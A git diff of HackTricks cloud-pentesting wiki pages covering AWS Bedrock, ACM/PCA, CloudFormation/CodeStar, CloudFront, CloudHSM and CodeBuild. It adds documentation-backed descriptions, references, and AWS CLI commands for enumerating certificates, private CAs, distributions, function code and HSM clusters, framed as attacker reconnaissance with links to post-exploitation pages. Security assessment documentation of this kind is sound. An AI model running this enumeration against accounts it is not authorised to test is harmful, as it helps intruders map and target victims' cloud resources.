--- a/src/pentesting-cloud/aws-security/aws-services/aws-bedrock-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-bedrock-enum.md
@@ -1,15 +1,17 @@
 # AWS - Bedrock
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Overview
 
-Amazon Bedrock is a fully managed service that makes it easy to build and scale generative AI applications using foundation models (FMs) from leading AI startups and Amazon. Bedrock provides access to various FMs through a single API, allowing developers to choose the most suitable model for their specific use cases without managing the underlying infrastructure.
+Amazon Bedrock is a fully managed service that makes it easy to build and scale generative AI applications using foundation models (FMs) from leading AI startups and Amazon. Bedrock provides access to various FMs through a single API, allowing developers to choose the most suitable model for their specific use cases without managing the underlying infrastructure.<sup>[[1]](#references)</sup>
 
 ## Post Exploitation
 
 {{#ref}}
 ../aws-post-exploitation/aws-bedrock-post-exploitation/README.md
 {{#endref}}
+
+## References
+
+- [1] [Amazon Bedrock Documentation](https://aws.amazon.com/documentation-overview/bedrock/)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md
@@ -1,18 +1,20 @@
 # AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA)
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-**AWS Certificate Manager (ACM)** is provided as a service aimed at streamlining the **provisioning, management, and deployment of SSL/TLS certificates** for AWS services and internal resources. The necessity for manual processes, such as purchasing, uploading, and certificate renewals, is **eliminated** by ACM. This allows users to efficiently request and implement certificates on various AWS resources including **Elastic Load Balancers, Amazon CloudFront distributions, and APIs on API Gateway**.
+**AWS Certificate Manager (ACM)** is a service for provisioning, managing, and deploying SSL/TLS certificates. ACM is intended for AWS integrated services such as **Elastic Load Balancing, Amazon CloudFront, and Amazon API Gateway**; exportable ACM certificates can also be used outside those integrations.<sup>[[1]](#references)</sup>
 
-A key feature of ACM is the **automatic renewal of certificates**, significantly reducing the management overhead. Furthermore, ACM supports the creation and centralized management of **private certificates for internal use**. Although SSL/TLS certificates for integrated AWS services like Elastic Load Balancing, Amazon CloudFront, and Amazon API Gateway are provided at no extra cost through ACM, users are responsible for the costs associated with the AWS resources utilized by their applications and a monthly fee for each **private Certificate Authority (CA)** and private certificates used outside integrated ACM services.
+ACM provides managed renewal for eligible Amazon-issued public and private certificates. The renewal and deployment behavior depends on how the certificate was issued and used: integrated services can receive the renewed certificate automatically, while certificates used elsewhere may need to be exported and installed; private certificates issued directly through AWS Private Certificate Authority's `IssueCertificate` action are not eligible for ACM-managed renewal.<sup>[[2]](#references)</sup> ACM can request private certificates from an existing AWS Private CA for use in a private PKI; certificates signed by a private CA are not trusted by default, so administrators must install the appropriate root CA certificate in client trust stores.<sup>[[3]](#references)</sup>
 
-**AWS Private Certificate Authority** is offered as a **managed private CA service**, enhancing ACM's capabilities by extending certificate management to include private certificates. These private certificates are instrumental in authenticating resources within an organization.
+Public non-exportable ACM certificates are provided at no cost when used with integrated AWS services. AWS Private CA charges a monthly price for each private CA and also charges for every certificate issued, including certificates exported from ACM or created through the AWS Private CA API or CLI.<sup>[[4]](#references)[[5]](#references)</sup>
+
+**AWS Private Certificate Authority** is a managed service for creating private CA hierarchies and issuing end-entity X.509 certificates for uses such as encrypting internal service traffic and authenticating people, machines, API endpoints, and IoT devices.<sup>[[5]](#references)</sup>
 
 ## Enumeration
 
 ### ACM
+
+The following AWS CLI commands enumerate ACM certificates and expose their metadata, certificate chain/data, and account-level configuration.<sup>[[6]](#references)[[7]](#references)[[8]](#references)[[9]](#references)</sup>
 
 ```bash
 # List certificates
@@ -28,7 +30,9 @@ aws acm get-certificate --certificate-arn "arn:aws:acm:us-east-1:188868097724:ce
 aws acm get-account-configuration
 ```
 
-### PCM
+### PCA
+
+The following AWS CLI commands list and describe private CAs, inspect ACM permissions and attached resource policies, and retrieve the CA certificate and certificate signing request (CSR).<sup>[[10]](#references)[[11]](#references)[[12]](#references)[[13]](#references)[[14]](#references)[[15]](#references)</sup>
 
 ```bash
 # List CAs
@@ -43,7 +47,7 @@ aws acm-pca list-permissions --certificate-authority-arn <arn>
 # Get CA certificate
 aws acm-pca get-certificate-authority-certificate --certificate-authority-arn <arn>
 
-# Certificate request
+# Get CA certificate signing request (CSR)
 aws acm-pca get-certificate-authority-csr --certificate-authority-arn <arn>
 
 # Get CA Policy (if any)
@@ -58,8 +62,22 @@ TODO
 
 TODO
 
+## References
+
+- [1] [Choosing how to issue certificates with AWS](https://docs.aws.amazon.com/acm/latest/userguide/service-options.html)
+- [2] [Managed certificate renewal in AWS Certificate Manager](https://docs.aws.amazon.com/acm/latest/userguide/managed-renewal.html)
+- [3] [Private certificates in AWS Certificate Manager](https://docs.aws.amazon.com/acm/latest/userguide/private-certificates.title.html)
+- [4] [AWS Certificate Manager pricing](https://aws.amazon.com/certificate-manager/pricing/)
+- [5] [What is AWS Private CA?](https://docs.aws.amazon.com/privateca/latest/userguide/PcaWelcome.html)
+- [6] [list-certificates — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/acm/list-certificates.html)
+- [7] [describe-certificate — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/acm/describe-certificate.html)
+- [8] [get-certificate — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/acm/get-certificate.html)
+- [9] [get-account-configuration — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/acm/get-account-configuration.html)
+- [10] [list-certificate-authorities — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/acm-pca/list-certificate-authorities.html)
+- [11] [describe-certificate-authority — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/acm-pca/describe-certificate-authority.html)
+- [12] [list-permissions — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/acm-pca/list-permissions.html)
+- [13] [get-certificate-authority-certificate — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/acm-pca/get-certificate-authority-certificate.html)
+- [14] [get-certificate-authority-csr — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/acm-pca/get-certificate-authority-csr.html)
+- [15] [get-policy — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/acm-pca/get-policy.html)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
@@ -1,12 +1,12 @@
 # AWS - CloudFormation & Codestar Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## CloudFormation
 
-AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure.
+AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure.<sup>[[1]](#references)</sup>
 
 ### Enumeration
+
+The AWS CLI exposes the following operations for discovering CloudFormation stacks, exports, and Stack Sets:<sup>[[2]](#references)</sup>
 
 ```bash
 # Stacks
@@ -51,9 +51,11 @@ Check for **secrets** or sensitive information in the **template, parameters & o
 
 ## Codestar
 
-AWS CodeStar is a service for creating, managing, and working with software development projects on AWS. You can quickly develop, build, and deploy applications on AWS with an AWS CodeStar project. An AWS CodeStar project creates and **integrates AWS services** for your project development toolchain. Depending on your choice of AWS CodeStar project template, that toolchain might include source control, build, deployment, virtual servers or serverless resources, and more. AWS CodeStar also **manages the permissions required for project users** (called team members).
+AWS CodeStar was a service for creating, managing, and working with software development projects on AWS. Its project templates configured development and delivery resources, while role-based project access let teams add owners, contributors, and viewers.<sup>[[3]](#references)</sup> AWS discontinued support for creating and viewing CodeStar projects on July 31, 2024: the CodeStar console is unavailable and new projects cannot be created, but resources previously created by CodeStar—including source repositories, pipelines, and builds—continue to function.<sup>[[3]](#references)</sup>
 
 ### Enumeration
+
+The following commands are retained as legacy enumeration references for accounts that still expose the CodeStar service APIs. AWS’s service authorization reference lists the corresponding project, resource, team-member, and user-profile actions:<sup>[[4]](#references)</sup>
 
 ```bash
 # Get projects information
@@ -76,10 +78,11 @@ In the following page you can check how to **abuse codestar permissions to escal
 
 ## References
 
-- [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/)
+- [1] [AWS CloudFormation Documentation](https://docs.aws.amazon.com/cloudformation/)
+- [2] [AWS CLI CloudFormation command reference](https://docs.aws.amazon.com/cli/latest/reference/cloudformation/)
+- [3] [AWS CodeStar FAQ (AWS)](https://aws.amazon.com/es/codestar/faqs/)
+- [4] [Actions, resources, and condition keys for AWS CodeStar](https://docs.aws.amazon.com/service-authorization/latest/reference/list_codestar.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 
 

--- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md
@@ -1,22 +1,26 @@
 # AWS - CloudFront Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## CloudFront
 
-CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3.
+CloudFront is AWS's **content delivery network that speeds up distribution** of static and dynamic content through a worldwide network of edge locations. When a viewer requests content served through CloudFront, the request is routed to the edge location that can provide the lowest latency and best performance.<sup>[[1]](#references)</sup>
 
-The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**.
+CloudFront standard logging records requests for each distribution and periodically delivers the log files to the configured destination. Standard logging (legacy) delivers logs to Amazon S3; CloudFront does not charge for enabling standard logs, but normal S3 storage and access charges apply.<sup>[[2]](#references)</sup>
 
-**By default cookie logging is disabled** but you can enable it.
+CloudFront usually delivers a standard log file within an hour, although some or all entries can be delayed by up to 24 hours. It can produce more than one file for a period when request volume is high, and standard log delivery is best effort rather than a complete accounting of every request.<sup>[[3]](#references)[[14]](#references)</sup>
+
+Cookie logging is optional. When enabled, CloudFront logs all cookies and their attributes in requests, regardless of which cookies the distribution forwards to the origin.<sup>[[3]](#references)</sup>
 
 ### Functions
 
-You can create functions in CloudFront. These functions will have its **endpoint in cloudfront** defined and will run a declared **NodeJS code**. This code will run inside a **sandbox** in a machine running under an AWS managed machine (you would need a sandbox bypass to manage to escape to the underlaying OS).
+CloudFront Functions let you run lightweight **JavaScript** at CloudFront edge locations. A function is associated with a distribution and invoked for supported viewer, response, or connection events; it is not a standalone CloudFront endpoint.<sup>[[4]](#references)</sup>
 
-As the functions aren't run in the users AWS account. no IAM role is attached so no direct privesc is possible abusing this feature.
+The runtime is AWS-managed and isolated. It restricts access to the network, filesystem, environment variables, and timers. In practical terms, an exploit would need to defeat the function runtime or its isolation boundary rather than rely on ordinary file or network primitives.<sup>[[5]](#references)[[8]](#references)</sup>
+
+CloudFront does not expose a customer-configurable IAM execution role for CloudFront Functions: AWS documents that CloudFront does not support service roles, while its service-linked role is used for service-managed log delivery. Therefore, creating a CloudFront Function alone does not provide a direct IAM privilege-escalation path through a customer-supplied function role.<sup>[[6]](#references)[[7]](#references)</sup>
 
 ### Enumeration
+
+The AWS CLI provides commands to enumerate CloudFront distributions, inspect their configurations, list functions, and save function code. The final `jq` pipeline extracts distribution IDs, origin IDs and domains, and alias CNAME records from the `list-distributions` response.<sup>[[9]](#references)[[10]](#references)[[11]](#references)[[12]](#references)[[13]](#references)</sup>
 
 ```bash
 aws cloudfront list-distributions
@@ -41,8 +45,22 @@ aws cloudfront list-distributions | jq ".DistributionList.Items[] | .Id, .Origin
 ../aws-post-exploitation/aws-cloudfront-post-exploitation/README.md
 {{#endref}}
 
+## References
+
+- [1] [What is Amazon CloudFront?](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/Introduction.html)
+- [2] [Configure standard logging (legacy)](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/standard-logging-legacy-s3.html)
+- [3] [Standard logging reference](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/standard-logs-reference.html)
+- [4] [Customize at the edge with CloudFront Functions](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/cloudfront-functions.html)
+- [5] [Restrictions on CloudFront Functions](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/cloudfront-function-restrictions.html)
+- [6] [How Amazon CloudFront works with IAM](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/security_iam_service-with-iam.html)
+- [7] [CloudFront and edge function logging](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/edge-functions-logs.html)
+- [8] [CloudFront Functions – A New Security Paradigm for CDN Edge Computing](https://aws.amazon.com/blogs/networking-and-content-delivery/cloudfront-functions-a-new-security-paradigm-for-cdn-edge-computing/)
+- [9] [list-distributions — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cloudfront/list-distributions.html)
+- [10] [get-distribution — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cloudfront/get-distribution.html)
+- [11] [get-distribution-config — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cloudfront/get-distribution-config.html)
+- [12] [list-functions — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cloudfront/list-functions.html)
+- [13] [get-function — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cloudfront/get-function.html)
+- [14] [Access logs (standard logs)](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/AccessLogs.html)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
@@ -1,71 +1,92 @@
 # AWS - CloudHSM Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## HSM - Hardware Security Module
 
-Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used.
+AWS CloudHSM provides general-purpose, single-tenant hardware security modules (HSMs) in the AWS Cloud. FIPS-mode clusters use HSMs validated at FIPS 140-2 Level 3 or FIPS 140-3 Level 3; non-FIPS clusters support the AWS CloudHSM algorithms regardless of FIPS approval.<sup>[[1]](#references)</sup>
 
-The unusual feature of CloudHSM is that it is a physical device, and thus it is **not shared with other customers**, or as it is commonly termed, multi-tenant. It is dedicated single tenant appliance exclusively made available to your workloads
+A CloudHSM cluster is a synchronized collection of HSMs. Adding HSMs provides load balancing, while placing them in different Availability Zones provides high availability and redundancy.<sup>[[2]](#references)</sup>
 
-Typically, a device is available within 15 minutes assuming there is capacity, but in some zones there could not be.
+CloudHSM gives the customer control over HSM users, keys, and cryptographic operations while AWS automates HSM provisioning, configuration, maintenance, and backups. Applications normally use the CloudHSM client through the HSM elastic network interfaces (ENIs) in the customer VPC, with private subnets recommended for the HSMs and client instances.<sup>[[1]](#references)[[5]](#references)[[6]](#references)</sup>
 
-Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS.
+Key material is handled by the HSMs, but it is not accurate to treat CloudHSM as having no service backup. AWS CloudHSM makes periodic backups of users, keys, policies, certificates, and HSM configuration; the HSM encrypts the data before it leaves the HSM, and AWS stores the encrypted backup in a service-controlled S3 bucket that AWS cannot decrypt.<sup>[[3]](#references)</sup>
 
-In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\
-Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution.
+You choose the number of HSMs needed for the workload and should load-test at peak traffic. Throughput depends on factors such as client instance size, cluster size, network topology, and the cryptographic operations used; adding HSMs can increase cluster performance, but the application and key type can affect how much load is distributed.<sup>[[5]](#references)[[7]](#references)</sup>
 
-Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster.
+CloudHSM clusters are regional resources and cannot be extended across Regions. For multi-Region resilience, copy a cluster backup to the destination Region and create an independent cluster there; manage the client-to-HSM path through the VPC, ENIs, and security groups rather than assuming that a particular appliance or cross-Region VPN topology is required.<sup>[[4]](#references)[[6]](#references)[[14]](#references)</sup>
 
-If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys.
+CloudHSM can provide a secure root of trust for applications that need direct HSM control, including asymmetric key material and certificate-authority integrations. AWS KMS also supports asymmetric KMS keys, but AWS services integrated with KMS use symmetric KMS keys for data encryption; an AWS CloudHSM key store used by KMS supports only AES symmetric KMS keys.<sup>[[1]](#references)[[8]](#references)[[9]](#references)[[17]](#references)</sup>
 
-**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution.
+AWS's current CloudHSM pricing page states that there are no upfront costs and that customers pay an hourly fee for each HSM until it is terminated. Check the pricing page for the current Region and HSM-type rate instead of relying on an old fixed launch charge or hourly amount.<sup>[[10]](#references)</sup>
 
-**CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements.\
-Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance.
-
-**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you.
+The CloudHSM data plane is end-to-end encrypted and is not visible to AWS. AWS states that it cannot view or modify customer users or keys, or perform cryptographic operations using those keys; the customer still owns the HSM-user and key-management responsibilities while AWS operates the underlying service infrastructure.<sup>[[1]](#references)[[11]](#references)</sup>
 
 ### CloudHSM Suggestions
 
-1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS.
-2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data.
-3. CloudHSM only **supports certain versions of firmware** and software. Before performing any update, make sure the firmware and or software is supported by AWS. You can always contact AWS support to verify if the upgrade guide is unclear.
-4. The **network configuration should never be changed.** Remember, it's in a AWS data center and AWS is monitoring base hardware for you. This means that if the hardware fails, they will replace it for you, but only if they know it failed.
-5. The **SysLog forward should not be removed or changed**. You can always **add** a SysLog forwarder to direct the logs to your own collection tool.
-6. The **SNMP** configuration has the same basic restrictions as the network and SysLog folder. This **should not be changed or removed**. An **additional** SNMP configuration is fine, just make sure you do not change the one that is already on the appliance.
-7. Another interesting best practice from AWS is **not to change the NTP configuration**. It is not clear what would happen if you did, so keep in mind that if you don't use the same NTP configuration for the rest of your solution then you could have two time sources. Just be aware of this and know that the CloudHSM has to stay with the existing NTP source.
-
-The initial launch charge for CloudHSM is $5,000 to allocate the hardware appliance dedicated for your use, then there is an hourly charge associated with running CloudHSM that is currently at $1.88 per hour of operation, or approximately $1,373 per month.
-
-The most common reason to use CloudHSM is compliance standards that you must meet for regulatory reasons. **KMS does not offer data support for asymmetric keys. CloudHSM does let you store asymmetric keys securely**.
-
-The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH.
+1. Deploy CloudHSM in a high-availability setup with at least two HSMs in separate Availability Zones. For durability of newly generated keys, AWS recommends at least three HSMs across different Availability Zones; also account for an additional HSM when maintenance or replacement could reduce capacity.<sup>[[2]](#references)[[5]](#references)</sup>
+2. Protect the customer root CA private key used to initialize the cluster. Cluster initialization establishes ownership and control through certificate-based authentication, and AWS recommends creating and storing this key securely.<sup>[[12]](#references)</sup>
+3. AWS manages CloudHSM firmware, so do not apply arbitrary appliance firmware. Keep the CloudHSM client, CLI, and other client software aligned with the supported AWS documentation.<sup>[[13]](#references)[[17]](#references)</sup>
+4. Use private subnets and restrictive security groups for HSM and client instances. The cluster security group permits client communication over TCP ports `2223-2225`; restrict administrative SSH or RDP access to the client instance instead of exposing it broadly.<sup>[[5]](#references)[[14]](#references)</sup>
+5. Use the managed audit paths rather than trying to modify appliance-level log forwarding: HSM audit logging is automatically sent to CloudWatch Logs, and CloudTrail records AWS CloudHSM API calls.<sup>[[15]](#references)[[16]](#references)</sup>
+6. Treat AWS IAM permissions and HSM-user credentials as separate control planes. Grant only the AWS CloudHSM API permissions needed by each role, and separately control which HSM users can manage users, keys, and cryptographic operations.<sup>[[17]](#references)[[22]](#references)</sup>
+7. Select the cluster mode and network type deliberately. AWS says cluster mode cannot be changed after creation, and changing the network type later requires backing up the cluster and restoring it with the desired type.<sup>[[21]](#references)</sup>
 
 ### What is a Hardware Security Module
 
-A hardware security module (HSM) is a dedicated cryptographic device that is used to generate, store, and manage cryptographic keys and protect sensitive data. It is designed to provide a high level of security by physically and electronically isolating the cryptographic functions from the rest of the system.
+A hardware security module (HSM) is a dedicated cryptographic device that processes cryptographic operations and provides secure storage for cryptographic keys.<sup>[[1]](#references)</sup>
 
 The way an HSM works can vary depending on the specific model and manufacturer, but generally, the following steps occur:
 
 1. **Key generation**: The HSM generates a random cryptographic key using a secure random number generator.
-2. **Key storage**: The key is **stored securely within the HSM, where it can only be accessed by authorized users or processes**.
-3. **Key management**: The HSM provides a range of key management functions, including key rotation, backup, and revocation.
-4. **Cryptographic operations**: The HSM performs a range of cryptographic operations, including encryption, decryption, digital signature, and key exchange. These operations are **performed within the secure environment of the HSM**, which protects against unauthorized access and tampering.
-5. **Audit logging**: The HSM logs all cryptographic operations and access attempts, which can be used for compliance and security auditing purposes.
+2. **Key storage**: The key is stored securely within the HSM, where it can only be accessed by authorized users or processes.
+3. **Key management**: The HSM provides key-management functions, including key rotation, backup, and revocation.
+4. **Cryptographic operations**: The HSM performs operations such as encryption, decryption, digital signatures, and key exchange within its secure environment.
+5. **Audit logging**: In AWS CloudHSM, audit logging is automatically enabled and exported to CloudWatch Logs, while CloudTrail records AWS CloudHSM API calls.<sup>[[15]](#references)[[16]](#references)</sup>
 
 HSMs can be used for a wide range of applications, including secure online transactions, digital certificates, secure communications, and data encryption. They are often used in industries that require a high level of security, such as finance, healthcare, and government.
 
-Overall, the high level of security provided by HSMs makes it **very difficult to extract raw keys from them, and attempting to do so is often considered a breach of security**. However, there may be **certain scenarios** where a **raw key could be extracted** by authorized personnel for specific purposes, such as in the case of a key recovery procedure.
+Whether raw key material can leave an HSM depends on the key attributes and the user's permissions. Extractable keys may be exported through key wrapping by their owner, while non-extractable keys cannot be exported under any circumstance.<sup>[[7]](#references)</sup>
 
 ### Enumeration
 
-```
+Use the AWS CLI once per Region to enumerate CloudHSM clusters, backups, and tags, and use CloudHSM CLI from a configured client to inspect HSM details. The `cluster hsm-info` command does not require an HSM login and reports HSM hardware, firmware, and FIPS-state metadata.<sup>[[4]](#references)[[18]](#references)[[19]](#references)[[20]](#references)[[22]](#references)[[23]](#references)</sup>
+
+```bash
+# Control-plane inventory (run once per Region)
+aws cloudhsmv2 describe-clusters --output json
+aws cloudhsmv2 describe-backups --output json
+aws cloudhsmv2 list-tags --resource-id <cluster-arn>
+
+# HSM metadata from a configured CloudHSM client
+/opt/cloudhsm/bin/cloudhsm-cli interactive
+aws-cloudhsm > cluster hsm-info
+
 TODO
 ```
 
+## References
+
+- [1] [What is AWS CloudHSM?](https://docs.aws.amazon.com/cloudhsm/latest/userguide/introduction.html)
+- [2] [AWS CloudHSM cluster high availability and load balancing](https://docs.aws.amazon.com/cloudhsm/latest/userguide/cluster-high-availability-load-balancing.html)
+- [3] [AWS CloudHSM cluster backups](https://docs.aws.amazon.com/cloudhsm/latest/userguide/backups.html)
+- [4] [Supported Regions for AWS CloudHSM](https://docs.aws.amazon.com/cloudhsm/latest/userguide/regions.html)
+- [5] [AWS CloudHSM cluster management best practices](https://docs.aws.amazon.com/cloudhsm/latest/userguide/bp-cluster-management.html)
+- [6] [AWS CloudHSM cluster architecture](https://docs.aws.amazon.com/cloudhsm/latest/userguide/cluster-architecture.html)
+- [7] [AWS CloudHSM key management best practices](https://docs.aws.amazon.com/cloudhsm/latest/userguide/bp-hsm-key-management.html)
+- [8] [Asymmetric keys in AWS KMS](https://docs.aws.amazon.com/kms/latest/developerguide/symmetric-asymmetric.html)
+- [9] [AWS CloudHSM key stores](https://docs.aws.amazon.com/kms/latest/developerguide/keystore-cloudhsm.html)
+- [10] [AWS CloudHSM pricing](https://aws.amazon.com/cloudhsm/pricing/)
+- [11] [AWS CloudHSM cluster synchronization](https://docs.aws.amazon.com/cloudhsm/latest/userguide/cluster-synchronization.html)
+- [12] [Initialize the cluster in AWS CloudHSM](https://docs.aws.amazon.com/cloudhsm/latest/userguide/initialize-cluster.html)
+- [13] [Update management in AWS CloudHSM](https://docs.aws.amazon.com/cloudhsm/latest/userguide/update-management.html)
+- [14] [Configure the Client Amazon EC2 instance security groups for AWS CloudHSM](https://docs.aws.amazon.com/cloudhsm/latest/userguide/configure-sg-client-instance.html)
+- [15] [How HSM audit logging works](https://docs.aws.amazon.com/cloudhsm/latest/userguide/get-audit-logs-from-cloudwatch.html)
+- [16] [Working with AWS CloudTrail and AWS CloudHSM](https://docs.aws.amazon.com/cloudhsm/latest/userguide/get-api-logs-using-cloudtrail.html)
+- [17] [Create and use keys in AWS CloudHSM](https://docs.aws.amazon.com/cloudhsm/latest/userguide/create-apps.html)
+- [18] [List HSMs with CloudHSM CLI](https://docs.aws.amazon.com/cloudhsm/latest/userguide/cloudhsm_cli-cluster-hsm-info.html)
+- [19] [describe-clusters — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cloudhsmv2/describe-clusters.html)
+- [20] [describe-backups — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cloudhsmv2/describe-backups.html)
+- [21] [Create a cluster in AWS CloudHSM](https://docs.aws.amazon.com/cloudhsm/latest/userguide/create-cluster.html)
+- [22] [Identity and access management for AWS CloudHSM](https://docs.aws.amazon.com/cloudhsm/latest/userguide/identity-access-management.html)
+- [23] [Command modes in CloudHSM CLI](https://docs.aws.amazon.com/cloudhsm/latest/userguide/cloudhsm_cli-modes.html)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
@@ -1,42 +1,41 @@
 # AWS - Codebuild Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## CodeBuild
 
-AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass:
+AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass:<sup>[[1]](#references)[[2]](#references)</sup>
 
